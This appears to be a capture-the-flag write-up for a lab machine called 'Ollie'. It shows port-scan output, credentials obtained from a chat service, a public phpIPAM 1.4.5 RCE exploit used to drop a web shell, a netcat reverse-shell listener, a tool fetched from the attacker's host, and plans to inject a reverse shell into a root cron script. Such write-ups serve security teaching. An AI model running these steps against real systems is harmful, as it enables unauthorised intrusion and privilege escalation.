.----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan [~] The config file is expected to be at "/root/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 10.10.165.63:22 Open 10.10.165.63:80 Open 10.10.165.63:1337 [~] Starting Script(s) [>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-06 22:28 EDT NSE: Loaded 155 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 22:28 Completed NSE at 22:28, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 22:28 Completed NSE at 22:28, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 22:28 Completed NSE at 22:28, 0.00s elapsed Initiating Ping Scan at 22:28 Scanning 10.10.165.63 [4 ports] Completed Ping Scan at 22:28, 0.33s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 22:28 Completed Parallel DNS resolution of 1 host. at 22:28, 0.01s elapsed DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 22:28 Scanning 10.10.165.63 [3 ports] Discovered open port 80/tcp on 10.10.165.63 Discovered open port 22/tcp on 10.10.165.63 Discovered open port 1337/tcp on 10.10.165.63 Completed SYN Stealth Scan at 22:28, 0.34s elapsed (3 total ports) Initiating Service scan at 22:28 Scanning 3 services on 10.10.165.63 Completed Service scan at 22:31, 164.88s elapsed (3 services on 1 host) Initiating OS detection (try #1) against 10.10.165.63 Retrying OS detection (try #2) against 10.10.165.63 Initiating Traceroute at 22:31 Completed Traceroute at 22:31, 0.31s elapsed Initiating Parallel DNS resolution of 2 hosts. at 22:31 Completed Parallel DNS resolution of 2 hosts. at 22:31, 0.01s elapsed DNS resolution of 2 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 2, DR: 0, SF: 0, TR: 2, CN: 0] NSE: Script scanning 10.10.165.63. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 22:31 Completed NSE at 22:31, 8.64s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 22:31 Completed NSE at 22:31, 1.61s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 22:31 Completed NSE at 22:31, 0.00s elapsed Nmap scan report for 10.10.165.63 Host is up, received echo-reply ttl 63 (0.30s latency). Scanned at 2023-07-06 22:28:57 EDT for 181s
PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 b71ba8f88c8a4a5355c02e8901f25669 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDP5+l/iCTR0Sqa4q0dIntXiVyRE5hsnPV5UfG4D+sQKeM4XoG7mzycPzJxn9WkONCwgmLWyFD1wHOnexqtxEOoyCrHhP2xGz+5sOsJ7RbpA0KL/CAUKs2aCtonKUwg5FEhOjUy945M0e/DmstbOYx8od6603eb4TytHfxQHPPiWBBRCmg6e+5UjcHLSOqDEzXkDOmmLieiE008fEVrNAmF2J+I4XPJI7Usaf3IzpnaFm3Ca9YvNAr4t8gpDST2uNuRWA9NCMspBFEj/5YQfjOnYx2cSSZHUP3lK8tiwc/RWSk7OBTXYOBncyV4lw8OiyJ1fOhr/2gXTXE/tWQvu1zKWYYafMKRdsH6nuE5nZ0CK3pLHe/nUgIsVPl7sJ3QlqJF7Wd5OmY3e4Py7movqFm/HmW+zjwsXGHnzENC47N+RxV0XTYCxbKzTAZDo5gLMxmsbXWnQmU5GMk0e9sh7HHybmWWkKKYJiOp+3yM9vTPXPiNXBeJmvWa01hoAAi+3OU= | 256 4e2743b6f454f918d038dacd769b8548 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFL/P1VyyCYVY2aUZcXTLmHkiXGo4/KdJptRP7Wioy78Sb/W/bKDAq3Yl6a6RQW7KlGSbZ84who5gWwVMTSTt2U= | 256 1482cabb04e501839cd654e9d1fac482 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHmTKDYCCJVK6wx0kZdjLd1YZeLryW/qXfKAfzqN/UHv 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) | http-title: Ollie :: login |_Requested resource was http://10.10.165.63/index.php?page=login |_http-favicon: Unknown favicon MD5: 851615F43921F017A297184922B4FBFD | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-robots.txt: 2 disallowed entries |_/ /immaolllieeboyyy 1337/tcp open waste? syn-ack ttl 62 | fingerprint-strings: | DNSStatusRequestTCP, GenericLines: | Hey stranger, I'm Ollie, protector of panels, lover of deer antlers. | What is your name? What's up, | It's been a while. What are you here for? ...
1337 port appears to be quite unique So, let’s try to establish a connection with it using netcat (nc).
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
nc 10.10.165.63 1337 Hey stranger, I'm Ollie, protector of panels, lover of deer antlers. What is your name? meow What's up, Meow! It's been a while. What are you here for? meow Ya' know what? Meow. If you can answer a question about me, I might have something for you.
What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? Bulldog You are correct! Let me confer with my trusted colleagues; Benny, Baxter and Connie... Please hold on a minute Ok, I'm back. After a lengthy discussion, we've come to the conclusion that you are the right person for the job.Here are the credentials for our administration panel. Username: admin Password: Oxxxxxxxxxxxxxxy! PS: Good luck and next time bring some treats!
According to the question, we responded, and they provided us with a set of username and password. Afterward, let’s go and check the 80 port. Here, we discovered a login page. Let’s use the username and password we obtained earlier to log in.
At the bottom of the page, we found that this website is running phpIPAM v1.4.5 we can find the RCE POC for phpIPAM v1.4.5 on exploitdb. https://www.exploit-db.com/exploits/50963 And we can utilize this POC to obtain a reverse shell!!
[...] Trying to login as admin [+] Login successful! [...] Exploiting [+] Success! The shell is located at http://10.10.165.63/evil.php. Parameter: cmd
└─$ rlwrap nc -nvlp 7777 listening on [any] 7777 ... connect to [10.8.92.150] from (UNKNOWN) [10.10.165.63] 43716 python3 -c "import pty;pty.spawn('/bin/bash')" www-data@hackerdog:/var/www/html$
Upon navigating to the home directory, we discovered a user named “ollie.” Let’s continue by switching to the user “ollie” using the password we obtained earlier.
1 2 3 4 5 6 7 8 9 10 11 12 13 14
www-data@hackerdog:/home$ su ollie su ollie Password: Oxxxxxxxxxxxxxxxy!
ollie@hackerdog:/home$ cd ollie cd ollie ollie@hackerdog:~$ ls ls user.txt ollie@hackerdog:~$ cat user.txt cat user.txt THM{Oxxxxxxxxxxxxxxxxt} ollie@hackerdog:~$
0x02 Privilege Escalation
After attempting to find SUID and sudo privilege escalation methods, we have been unsuccessful. we use pspy64 to search for any interesting cron jobs. wget http://10.8.92.150/pspy64
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive) Draining file system events due to startup... done 2023/07/07 02:58:29 CMD: UID=0 PID=97 | 2023/07/07 02:58:29 CMD: UID=0 PID=96 |
Based on several minutes of observation, we noticed that root regularly executes “/bin/bash /usr/bin/feedme.” This appears to be a potential point of entry so we can confirm that we are able to edit it and inject a reverse shell into it